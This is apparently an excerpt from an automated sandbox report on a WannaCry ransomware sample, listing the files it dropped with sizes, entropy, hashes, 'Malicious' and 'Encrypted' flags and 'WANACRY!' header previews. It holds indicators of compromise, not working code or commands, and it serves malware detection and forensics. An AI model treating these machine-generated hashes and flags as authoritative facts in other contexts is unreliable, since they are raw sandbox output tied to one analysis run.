                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202120
                                                  Entropy (8bit):7.99910724453835
                                                  Encrypted:true
                                                  SSDEEP:6144:K98tySpDP4vqu8myL/ojO37hWfx0+j2F0N:IS/ojOFgWC2FO
                                                  MD5:2E3BA76735C3199373CFDA4742F986F6
                                                  SHA1:DAAB04FDC298EA37B2820BD41A4DC17C69FE2025
                                                  SHA-256:E600839EAFD95446C673A9AF8202B141E4014C866B56076C91E11FE8EFFD0E58
                                                  SHA-512:96486958F79270244356046717954F97A195DD492601BEBB5C74168CD445C35D551FAA3AD078D434E57B5381455724AC8FBAD07A39794FC271951BEB28FE74D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34536
                                                  Entropy (8bit):7.995221646879254
                                                  Encrypted:true
                                                  SSDEEP:384:L3okjUd03YY5z8jpn3Jitmhm4XPiokrzmgS2PfK/vks9b6icHYxIrPiRqiLZFBhD:LY6Jw3hNUdfBkbRxxKHiVlWs1i6rDj
                                                  MD5:C67F715F9D1BC5B175D3487235A3DD0B
                                                  SHA1:964E301602855A719226FE2C79AED421295CF216
                                                  SHA-256:E013243A00C21FA29AF9FE4DA33071676B16CB3539B5BE6D693B61DF61E5095D
                                                  SHA-512:739A315BCFA1F29951395B36CC4B841EF01771C31EC89F32045070F2656BC934C9E4D3E912D43083A49BF224A59B319697AC2602B937629679B580549A6430DD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):227064
                                                  Entropy (8bit):7.999235571649068
                                                  Encrypted:true
                                                  SSDEEP:6144:8rb7KuFCGLz6rzurFgNTzswz4r5Bkz+mW:8eYz6rziByqmW
                                                  MD5:21C0018D17512CCDA55C61923999D566
                                                  SHA1:A8FADECD851441B56BB047EED4FC5487BBAA3734
                                                  SHA-256:9F431941955583AFF21E88B014839C66C0D998C3C6BA5870304A9B0128807E3D
                                                  SHA-512:BCACDD402EA51BF963482229CAA54B1FB6B89E8E4D40A2B891BC22366BC5AB1B5B2ED9B73602624E33FE4FCEE622AEA0445288CD16F587F93E29D135A51E6CFF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):53752
                                                  Entropy (8bit):7.996588520050917
                                                  Encrypted:true
                                                  SSDEEP:768:FBsO/NUEuIaalBjeTrhe2HU259EFY/wRe/imTSAGkNrN3YhxZ9jlWpd9pHEFdyXQ://p7lBCTK4StH0SAGYrNIp9spd9pkFPL
                                                  MD5:FCEF6D4029230BCAA72305DCAB62192D
                                                  SHA1:743319AB25CD8048B4A969F464889CC6FB28DFFB
                                                  SHA-256:E6F9C82243DD147B97B4CCFD99C02FAA7C483478222B0245EDC0F28783A3750D
                                                  SHA-512:86A353144F484ADE0FBA6C7A7071EC58B16B0189AEF6E72EF75B2B8D0A1229240BF20EAB934751A5D8AB3C0DBC3688DED17B0F34797E719046866475A5F74F0C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8008
                                                  Entropy (8bit):7.979806667248807
                                                  Encrypted:false
                                                  SSDEEP:192:HLy65yYh1+8m+igp+W+r06OkylI7UU+HqjoV/iQl9qZwTFTgyU:H98wmrYTc9mfq2TgyU
                                                  MD5:9A4A3BB493750D9D0C62825929BF5190
                                                  SHA1:BF9F8C84C8F0991D143DB756C979A155554B05B5
                                                  SHA-256:1B7BAD8DBF19EB3B44D6915DFF1A7CC07531A96AB75A1C9CCDA6104B5E11CEE3
                                                  SHA-512:694B893BC5B49F89C7F114A1AF02D3D68908570D42DAE9B4CC83996AE860E1A60C5FB9215F99D8AEFCA6212213ED962200007C6F0EBDEAB75C2F8C36299A7152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):123256
                                                  Entropy (8bit):7.998652798814184
                                                  Encrypted:true
                                                  SSDEEP:3072:E/bK7la2qY2b7jz02i/TaGN36XWKLkj3fWAOA6HvuMh39tk:ETK7c224bsXWhzO9AovFttk
                                                  MD5:9B3003B94AA23EA2A7B940DFC0358BE6
                                                  SHA1:FFEADC1E5E9413566BCBB851970C8004E934E14C
                                                  SHA-256:B1AEA0A9FB655C86EA1F48222D5B9822A8441BFE3595F34F86F4C3D60B4A2040
                                                  SHA-512:E7DC4398C4C15065CCB2790EC245B7E867B2AC0A276370A851B1D9F20C73F8DF06CCAB0626AE8F4282D6EFEA7360F616E6E2E7D0A77C0ABB6A4D51EA3BD5220C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):95112
                                                  Entropy (8bit):7.998129436564507
                                                  Encrypted:true
                                                  SSDEEP:1536:e/nz2LmkExqw5mM9NkROjVE/Ymu97SV+TfsUlia7D5Banqa94xAkyTd+6Fak9Tbl:RgmSNbq/Ymu97SV+bsUTdk55Td+Gp9fl
                                                  MD5:BC3649C955BCD5E7508965F9ED6D6403
                                                  SHA1:78AAA6363690D35DFDFA33CC14500DE03BCF3BE5
                                                  SHA-256:386DB7ACC4489020A8C74ADD0418FECCE722909F99FA2C88ADE26B70723043A7
                                                  SHA-512:45A4470756F51442A543F21F81E65F295668E350CF94C309BE91B7EF321FBF414E6AEE529DAB8F1A7150E9659124785517AEBD9463A06A2E4E36B9F220578F3D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6872
                                                  Entropy (8bit):7.973874521868196
                                                  Encrypted:false
                                                  SSDEEP:192:gsE0nUGTkO88z+9QPw3cPQyaIRvh60U9tRm/re+:BnUGAP8zXh4kC9tRm/1
                                                  MD5:F0FBA1A68AC4F8487C796E56D07B1C7C
                                                  SHA1:505A1F375C1DDF80DB853B10953E2BCDE1ADF038
                                                  SHA-256:3B8B33479403157209DD2654DC33EDD7DD7874AEE4D24E0479B4E6E92D057014
                                                  SHA-512:1B7B6E25BE2673D29A080A4E7BDD92E56F06C79624F3051E6357CE51D013CE3531C6100002FACABD3CDD0CD9974BE67CAC5152BF009941512E4E448702D7336E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):122040
                                                  Entropy (8bit):7.998798266026306
                                                  Encrypted:true
                                                  SSDEEP:3072:IMOpYVidkf8nKDTssrWZxe6AXypoNuN1vxcwoBy0r/bgzvL5TBxc:IZpYV0kkK3FqZFpwuN5kr/szvnxc
                                                  MD5:9E228DC8C70B8D4D2A87825198B2C89E
                                                  SHA1:0F760A08E68F1F79335CB539EFEF6A7D2AB82E67
                                                  SHA-256:06578EFFF5B271D7F94291441186236C5EE20D6AE9842259F13993580E0AB4A6
                                                  SHA-512:990BE55B722E762237ADA97F369BBA8B70FF575F6979D91F9B550BEC9F247D4EFC76DA20B3D4216D87CA906EAB11101B7CAB44659C52F3C5FA93F500ECC86715
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):121496
                                                  Entropy (8bit):7.998660357706123
                                                  Encrypted:true
                                                  SSDEEP:3072:3rUS6Uqzgf2gKxJlU8ctEm1SRiZvPh8r6ffAY3HuntBr+69:3wSMEfwxjU1tEGhAuHu7+2
                                                  MD5:BA49BD89752B2C872712AC3BE47EEC73
                                                  SHA1:84DE1278D3B7B4FDF400D22DCB1CA9D8417D3FAA
                                                  SHA-256:67636A7A09C07064161E06D68B57B4B8B0B36840E916577E253330EA29937C9A
                                                  SHA-512:E1ACF23D1D8D0D5AF3256F7439B4AE2BAA51A4E00B72ED51270BEFE77B75219AF7F0D6F252B0F7D2679A98C35E40023E4F6842E49DF6CEFDCF3794E36BFC0EC3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65784
                                                  Entropy (8bit):7.997296961858981
                                                  Encrypted:true
                                                  SSDEEP:1536:WLZm/gnFC4iV/czwR9F71sloUI4LAKjaN7BI02Kk6:WLEghiJc0P9uloUI4LAKjaB72U
                                                  MD5:A373FFACD1298403BD4B93590165A584
                                                  SHA1:84593737E386EB90A9AA5FE8C23BF8504F8EFF59
                                                  SHA-256:111D8597817A6A91C38FDD2E57F0EAE1D8C387E49B922DF34C3DE7879F3FF156
                                                  SHA-512:8320C03F00956DD685383C03E7357123086B297787ABDB2D9DE076FE86AD534C59BD4655556E4250F5B833DE9307DC0B9ACCD1775A4E95FE6683BE08858F4F5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45800
                                                  Entropy (8bit):7.995937744072546
                                                  Encrypted:true
                                                  SSDEEP:768:E+gIFLUpnZ7mv45nvvLCTwhVnG1fJuFAA96:EbUC1E45Hn+AAV
                                                  MD5:40BF11A814096E7E5D234495BC5D23A6
                                                  SHA1:EA16977CA2E8D0CEB7839928C895CACD2FB0E322
                                                  SHA-256:B033FCE237DBF0F1B99E25AD3A8827033F01BF6205166D7466E216C788DA6B48
                                                  SHA-512:0D733B61D27D93612175E2610709CE24A6A4FAFA0AC4B05E08385888EF72944DE713B5F7437F3CF346129CAC461B02EF3C91907EA7FD6E0A8CC0863EAD73CE39
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202536
                                                  Entropy (8bit):7.998912684048249
                                                  Encrypted:true
                                                  SSDEEP:3072:TC98dVvGau9ze7EH66N8HeDfdb4ovF7UjMfc0n53jfmfUzDAzONjYrK21PqaM13x:TCgnJ7avhdvF4s5uUzDAzLrFG13JrX
                                                  MD5:F014E9DA54A31FB1100E3CB304A3F6DF
                                                  SHA1:892BD349F27B5E08D0DE1D139BE8214CF7A9C5C1
                                                  SHA-256:AC9FEBB3F3F3FCFC02E99EEDBE42209EDA2C317D3D0825036CABA001E99FF127
                                                  SHA-512:E6D49D57BB94294E18F105247A2AF573EDE79BE55A4430997F99512D4D0E2B8C95A6EDDFDAD2521FB3712BA85DEB11022A1C5BF6EE1CB3E30D9369D36FB3A402
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16200
                                                  Entropy (8bit):7.988130625428985
                                                  Encrypted:false
                                                  SSDEEP:384:ZNUzD0/mukiAA2otagQdskOKi5hI3uyDuwmIAPCKXB0NDnY78z:TO0+uzk3pdsKi5hI3uafPLKKFnY7O
                                                  MD5:25E2613C7507A8A9222F6B431A55CBA8
                                                  SHA1:584B5D1399BB6B3823DC3D22890F2847D2F65BF7
                                                  SHA-256:A7DC0D1133B84274B5B4E0E7A270318AB853A453B383FC4F2C020257CFE62709
                                                  SHA-512:F716D68C3518487602DFBB7EF3917B2B5E45E7B7B2B995CDAD43FE4E72ADD882C56C2D9F2999E1A91EFFB0902F712B609FA44072BA86EF68C6FFF11F0DAE4C39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):49160
                                                  Entropy (8bit):7.9951834510139355
                                                  Encrypted:true
                                                  SSDEEP:1536:PVJz1yd1b+qeqssHmYuILxWW7aYP1vv6nhQPd:dJZXqeaHnJEW7tlvWhQPd
                                                  MD5:36CFFC1BA5BEF4B218FA9E96B35B610B
                                                  SHA1:D3C5F2D3C5DD614F05B7B866BCBB9E2BE1E21BC2
                                                  SHA-256:0CC2CA9ECC7CC786830BAE088F8E5E57BA869D27F4F9B4CA6866A2C7D94DB537
                                                  SHA-512:B4B4D0B4A9C8F0DF2299FAF1E36577DAB2A5EFDEE1184CDD41A8D434EA44D6E481404508D370AF0951E51D20ABD60AAB49826C4495E9FB65C846C721426F466E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40328
                                                  Entropy (8bit):7.995794522066687
                                                  Encrypted:true
                                                  SSDEEP:768:DtVAfECIgto74W4Vi4cQgXKhMI65AnoKEGrmWWYKYz4M1u:DtqfEQa4/rcfXKeI65AoKtrKYLu
                                                  MD5:590CFA19229BE32C566105A52E194C1C
                                                  SHA1:2F330A1DD40191DBDE9A077B8E6093EF3EA1A6DE
                                                  SHA-256:611E3552B4E5486199BA278B489C6AEDAFEA77DBE0F08C47786E13F27BC9DBCC
                                                  SHA-512:BCFA30EA86DA24763C1813A6B6591D74D956D8060AF7C5D25C798E29A98EB5358E1D65EB1930639DA340338A82158C133A6D823BEC4FB9E2C979AE5AF11DA9F1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):799560
                                                  Entropy (8bit):7.999801322075106
                                                  Encrypted:true
                                                  SSDEEP:12288:JCaUrqLcca5VSKcOO20LcZbd9/S4/MEcjsqowTx5cVS7Vr9P9bGCASL6:rUtcQTcOOFwZb//S4/MrT/xGV+XRbASu
                                                  MD5:ACE645234868B92684209AC53177A003
                                                  SHA1:62923A3B814AC1CC2EF8EC1A0374AD921A6F3C66
                                                  SHA-256:3E55A89F97C7E75FBEF61CF7A3720F04213A2FBA21DC06CAA0C495A59898DDFF
                                                  SHA-512:E7B583DAF128B195911C7EB443007300839D696C1205E0597CD07F0BDFB1816834BDB92A91B6A9D711C5DA72D70EA213671DAFD0887531167A2943C019524224
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89144
                                                  Entropy (8bit):7.9979869212743875
                                                  Encrypted:true
                                                  SSDEEP:1536:kzI01h6SLVlIYEiE1yupmR0pBedYLLoLPpUJ08usXDZ+hWkApFl/1GVn2:k51h6Ilte4MqcBedsMVb8u2DZ+hYl/1t
                                                  MD5:D2FCB7E7B5E31F2CE7F28255BD674277
                                                  SHA1:E97B478E324B0F595409B0F0C24407FFC039D58F
                                                  SHA-256:4CB6E2A811157C2F7C4124FD796156A622D9D8CF468D144D447A7DA588317593
                                                  SHA-512:223658B44F57337848417140C5B1EB92B53AF6FF4078ADAEACD54FC2A2D1C16F14FFF1248E723AB37FA02066FE94C0ACC8280C1400B62D0694C3E7F2A335C7F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):186072
                                                  Entropy (8bit):7.999028499215018
                                                  Encrypted:true
                                                  SSDEEP:3072:lZLkRjE7WsqJjRg3HiB5QnLX2/TkbHKz8E9WiNSoura+YRd8m/frWeepXT:PkRI7bG22uLb2BI6S9u+YvZjWvpj
                                                  MD5:E8DCF4B5B4F70219BF61495B5CAC1A17
                                                  SHA1:307A7F5585E3CE6555743FF98E2FC460405A4B73
                                                  SHA-256:4F386E5DB4608C5DF292B2AFD989D289A6FA01CFC1F2E63FCA499FFC5047E7F6
                                                  SHA-512:0E484EFCA400AFEB3562C9328A881D214A88B749951622B586969C65B4F2B6B0CAE8B203C9494712653581883B0E5FC5CAAA4D5A1E4579A01DFABC93C83EE26D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):17736
                                                  Entropy (8bit):7.990090811555969
                                                  Encrypted:true
                                                  SSDEEP:384:JZ4SHU1x8fVuZJBZQO4V7lCBKe+Dv8M+VOfKNgthQQnMwoovQaZIPqUf:cCwmNuZHZQLV7UKjDv8M+VOSNgtKhaZw
                                                  MD5:19D40551A46E9ACC2E89E3347C5B3D33
                                                  SHA1:2BF67FEB52EC6515D1106D976FA92EF4917C93AB
                                                  SHA-256:7C7DCEA700096ED1074AC023A30B97407114A5885A476DCD2E43E1817899828F
                                                  SHA-512:8E6E51D72EF29F5CD97625888864D56C4129502956BC9BD5CC28BD8388A3AFCDD168650B6D621C17BA9904DC864C31FFC60538539145EABEA49952257283A146
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):73912
                                                  Entropy (8bit):7.997634603993111
                                                  Encrypted:true
                                                  SSDEEP:1536:YZmu5Z1oFfSml7elrtVelsBl2qqwdUlZ8wysjXB:YZmu5Dgl7uuCf2Bhywx
                                                  MD5:325F6DFDD80291D7504E1E5326631282
                                                  SHA1:993ADD0C459A6EFD8AA9996534539B6A92551536
                                                  SHA-256:916FEFC7EA16850150658C558C256BFC0B99EACAEB5FC43FC04F2B5B8E7AB452
                                                  SHA-512:A18FF0F88FECE018C0ECD5E3E3205BA79C19E8092002955428F04EA860A228083FFCECB1FBA46FA5CA7D262083103966564F3A19CF7015774C16C9B070064540
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19336
                                                  Entropy (8bit):7.989214822925728
                                                  Encrypted:false
                                                  SSDEEP:384:SFg+iG6GVRNzKwrhMJMckmIz418YZAxIJnnNfpvXpGSsSLxVk5:SFn6mrjfckmxv+xIln59XpGxSVVm
                                                  MD5:9EC19256A9E8224DC0F10EEEF316451C
                                                  SHA1:FCF0A5EB2ED33E544CD75E9C060A3A9CD0E91D63
                                                  SHA-256:CA7567E19F6151353CBB1E357FB5E4B15A46C84CA9BEED4CD6DAB4EBDE422D2A
                                                  SHA-512:A999300111B573461CF891E3E07E7E49A9BB028CC25380E72EA2F63A6115F723996BBD750A23DAD99E7F9034BA0FF3856BD6575D596B77401BCAD436551283DF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20680
                                                  Entropy (8bit):7.990892039491002
                                                  Encrypted:true
                                                  SSDEEP:384:CqbA+pTJolp3R8/pmZt0ylH8pzh1ktVSGJ3dP6DBBKX2YGFnPFo8T/D:CYPk1RAmZvcnatVSuKXdF9jD
                                                  MD5:5A1CF04A16C3433E66D9B2B059C49277
                                                  SHA1:D74925C1EA6E87ACCF5CEBEE30D4D17E2AFA0129
                                                  SHA-256:FE8AF96F61EA775F1B2FB34E49B58F1AF7C920A0391FEBA2244ACA88B36AAF5C
                                                  SHA-512:5E604BF3E0F0A5AF271A1FF6AC0892E10CBAB476252C248D10BF949DA95E9B0BA4F477660FB8DA0F163028E17DF832614D1AFEB9B68D9112272A04CAABDF9197
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1608
                                                  Entropy (8bit):7.889873012852417
                                                  Encrypted:false
                                                  SSDEEP:24:bkG2IEEKiFGDwxarC4hddYzyR2SOZ4VM5WNlhl4Cbij1qanUOzkq6uUpFF1xX6ei:bkd608x4CcfOy544fXijEduUlLXKFEB6
                                                  MD5:0FA9E78ED5A1254DB8FE32C6A0E71F32
                                                  SHA1:DCF76903C4ECB0BBEA2E17336F1D629EA52DC8FE
                                                  SHA-256:DD8E0649A7D51C1A219D6270099AC945992E8CFF6F88150559D09C7BBF0EEA9D
                                                  SHA-512:53E895445C37C283953680B55E7CF1036A1F122A592DAE01EFFDFC5FA85FEC4B55E3A2B4D322ABC4D2134D58CE8275D4AEE9DD91E9812136FCA1DB465295093B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37464
                                                  Entropy (8bit):7.99534123291725
                                                  Encrypted:true
                                                  SSDEEP:768:pJu+ugR70rvI3aZpfQGzdFIu3mWI8tJF2ALie2hXWOvLeZKnb49IF+M:bu+3xupfQGzdFIEmeF2Aue+vLIg44D
                                                  MD5:575F5877D801483560D58A753B1A2101
                                                  SHA1:47D1A6255C97F1D3F6212C2028843AB06D0E8C3F
                                                  SHA-256:CB93626EAD1791CA5759C0F0FF1C6E1F789EB584137C0317901365A2B1A9E8F2
                                                  SHA-512:EF15A65F5F5CD1C8C1DEF3A698B602F27B94ADA497FF950FC12A489E22743A6CB976099AEF94FDF0A1142093A865DEBC7C3ACEEC37A8D55710E744763CEED892
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):168968
                                                  Entropy (8bit):7.998861858012997
                                                  Encrypted:true
                                                  SSDEEP:3072:Q5CSHSy96gGE6U1EgSbDWwXqPuwz15YhcBVHWsGUTKM7MzmE:QUSHL62E1b6uqWFhcnW9JM7MiE
                                                  MD5:FA7ECE6E695E467C30FD27BB60DFAB4B
                                                  SHA1:E1D72D012D67058D89D2E5E3E35A2063FCF5C8D5
                                                  SHA-256:BC9E1ED1C2431E88F60FE0FA0F5D3B48DD9DEB512C9F0C5A10E963D2CC2593FA
                                                  SHA-512:285F9E6B364FF63B21E0F6369CF480B7B70C7727E13D112269B8F4FE7510FCEB1FEE7D993A00152052B2249893BDE1EC83BEBACDF01BC91B355769109E7EBB77
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):51224
                                                  Entropy (8bit):7.996723736114971
                                                  Encrypted:true
                                                  SSDEEP:1536:E7R57u1znHt/KUS1P8mibeFZWGPgOFfi67WFDdhO:Y57qzHtRSybYQGNfWFDfO
                                                  MD5:D2A69098216F1E7CB56EFEDD22994078
                                                  SHA1:CCA5FA954B1854F2881283F1CB9827591416C2CC
                                                  SHA-256:32AC09FC100F5209C748052BB8F505E6854907C104852BE933C9E7F4BD105080
                                                  SHA-512:C9E637A4A4389CDF6A0B1E05FEBC9D9123EE7126B6219B578D26CA0B56F43C99275AB64248560216B75D9329C363AE113195B0732A0668C668DEABBC22762C53
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):69016
                                                  Entropy (8bit):7.9971435479437964
                                                  Encrypted:true
                                                  SSDEEP:1536:IEHB0qJ7/1yx73Ka8vAnCpSFhgPkmBRzKKpQh2CBe3j:PHeM7etngPN6KpFCBe3j
                                                  MD5:A54F8542CDD6E107C8CA1ED474E5D21E
                                                  SHA1:5417D163CCD916463A93512DF9984A57C15DD98C
                                                  SHA-256:2D8959B5644CAFE23F381D7A187F24EA63BC69AB04071C42849CAE907303CF60
                                                  SHA-512:2C84AE9E4151B41690B785BD80321E6B37DA1E8C1D7472470B0DEAFED3C9F353FECBA2EFCB41831787952F3903549B9CD33D460D0776CDC2BF3C709389E342CE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.99442180691795
                                                  Encrypted:true
                                                  SSDEEP:768:QYJzKY+0gZhJ9CLredbwYaAqOlLQHkKKvhErLsRyK9JObXjNdo+B:QY4YnLreDaYhcfLe9ObQQ
                                                  MD5:56ECFE79CBE829895E3A51E39D133C28
                                                  SHA1:7B8C9DA54FC6B7CF78CD19BD65D18C7BF9E17926
                                                  SHA-256:6A69082DC1E4757C6D1A88C9026500B47541AE8B6582275BB9C7471E1FBF594B
                                                  SHA-512:888D7F9F1225D96913B00C51BAA37D30C1A10E6E8C4D41AF7FAF85353EB2DC25CE695B1A8E378C5C030E8652EE61633C3AC3B05FD22629ADEE384EABF74A7E85
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998232436732257
                                                  Encrypted:true
                                                  SSDEEP:3072:M6LximSsgSdFi3NO+SIzP9eUCp9sWnh9oYF7E:ZNiav2NOWP97uSej7E
                                                  MD5:3D4A4588471E93890C28287305B326AF
                                                  SHA1:252D9CDA8609EED48DBFA8515066CBE33D1CD062
                                                  SHA-256:0AB0EFDAA75BE866AAFE115686BC67DC2D0A555E4B5A7995D9193A39D76423EA
                                                  SHA-512:2C2D9E757ED2C6A2C0B1118F6ED9B9F347AF1DBA9568377F82F5FB5C94F7F49D824A2E88A1F39ABE65E0F69865AEF9DC006E9A6FD2AE27D83F5C24B3937BCF1B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):47576
                                                  Entropy (8bit):7.995573128949923
                                                  Encrypted:true
                                                  SSDEEP:768:nxSYRE9wQiDKzvwnIw9PXoAjpIUITVjsfcZdWuY849gtHePXeCBZGlsw7:nxSYRywQiD+gNYAKfFsfidWuY/EePuGC
                                                  MD5:7AE06D3A2A33129BE655F73DFE1EEE25
                                                  SHA1:FC308CB65908EC76565753C1F2CBBE8FD4C0D657
                                                  SHA-256:5DDB2D4CDC55877DF22C81133810CBE2B4EF5D20C0893E34BB98B8C1233B3DBF
                                                  SHA-512:D65C28EEDF6B886DC0DD742EAE979C0240B3057EBAF04A98C9D34CF8C22B5883C1BA3D08DB590CF5C51AD99280AD7BA22AE46C8145022C938AB209A4A45C4F5A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84259899688765
                                                  Encrypted:false
                                                  SSDEEP:24:bki0AYEPN+e6HPqsB9dKqA9rMT4G+ZX6lbynTEOGRVEZrP1HTmZx4qSxiIgNi8Mw:bkBE1WNBSb9gmibyniVEZr1Tm74tg48B
                                                  MD5:26E1773DF0D57A0D5329EBCF799C64BA
                                                  SHA1:54015B652E0EE556962EA23A7B75791785FAEDC6
                                                  SHA-256:10961514909239FB8A548700823AFCFD85D9E59F9425A06B45B5AE21BA9EE31D
                                                  SHA-512:DD206089AE7156D2277338409C4A02B6CA3CFE59F987BF936D2E3D78572DD8A379CA8E99022238E380C2A2EBEB432E8B2AD9089AF6BB29B85AD7BB60A8172191
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860896880517714
                                                  Encrypted:false
                                                  SSDEEP:24:bkN3n3zjWVj+AtfRfhtUFjBBRBl+PAO/qrjTAn8uOmFiVPof5n:bkhnWEAttht81+d8f4vORiB
                                                  MD5:23F4EE5EB0D36FF8F48090D6DC5EB616
                                                  SHA1:2B01EAA57CB1D913B6D46E5E4A43032981DAF997
                                                  SHA-256:A41DF67A2D3E4D7B5EB05EC38B5FB98AB6DDB1F8CE5E073324A45A818CDF389B
                                                  SHA-512:3B67C7BD8BBD7493287D4F9FCFD4EBA3485EA969948AEDC782F236B2F50395AB398B87B7EEDD45D01F68EBC84F395839D01051968639B78AD13DC108FE24464C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.829347230978042
                                                  Encrypted:false
                                                  SSDEEP:24:bkicUDYnRFVR0V2MYt9NYGv1+e7KT9CIQUFoKp6wjFQuyRuXH:bkiV4vWAMYnNd+eU6U6O6qLXH
                                                  MD5:FC0BD4C904E73F1190969646CC27922D
                                                  SHA1:485B96E303525DE91637D83438667C7F5EE3011D
                                                  SHA-256:205168E635F759BDE8E388A25679729CFA5133AD75747B4B09302E365AED4D3A
                                                  SHA-512:34A226EEDD6CD87B927C6EBA0C99C5595B04F4AC9C46D765947063AAC0C1C4D7D8480B5B6FB9E62DD9099090CA25AEE938296B84FEB79CFA24AA900926F3B5C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857904470184713
                                                  Encrypted:false
                                                  SSDEEP:24:bkXn7xZ0Ad7xV1jkKawlR5cj4Pc3b+IwynbiJwugWJIWeLvVAKL8f1:bk37xWEV1le4Pc+WbvrsqrVjLo1
